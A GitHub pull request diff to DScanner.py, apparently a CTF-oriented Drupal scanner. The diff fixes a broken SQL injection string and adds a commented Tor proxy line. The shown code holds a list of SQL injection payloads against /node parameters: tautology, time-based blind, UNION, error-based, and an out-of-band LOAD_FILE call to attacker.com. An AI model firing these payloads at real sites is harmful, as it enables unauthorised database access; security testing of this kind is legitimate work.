Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 3 additions & 4 deletions DScanner.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@
import base64

# Banner
BANNER = """
BANNER = r"""
___ ___ _ __
| \/ __| __ __ _ _ _ _ _ ___ _ _ / | / \
| |) \__ \/ _/ _` | ' \| ' \/ -_) '_| | || () |
Expand Down Expand Up @@ -47,6 +47,7 @@
proxies = {
# "http": "http://127.0.0.1:8080", # Uncomment for proxy use
# "https": "http://127.0.0.1:8080"
# "socks5": "socks5://127.0.0.1:9050"
}

# Expanded sensitive paths (CTF goldmine)
Expand Down Expand Up @@ -164,9 +165,7 @@
# SQL Injection
"SQLi Basic": {"path": "/node?title=1' OR '1'='1", "method": "GET"},
"SQLi Blind Time": {"path": "/node?title=1' AND SLEEP(5)--", "method": "GET"},
"SQLi Union": {"path": "/node?sort=1 UNION SELECT NULL,database(),NULL --

", "method": "GET"},
"SQLi Union": {"path": "/node?sort=1 UNION SELECT NULL,database(),NULL --", "method": "GET"},
"SQLi Error": {"path": "/node?title=1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--", "method": "GET"},
"SQLi Out-of-Band": {"path": "/node?title=1' AND LOAD_FILE('http://attacker.com')--", "method": "GET"},

Expand Down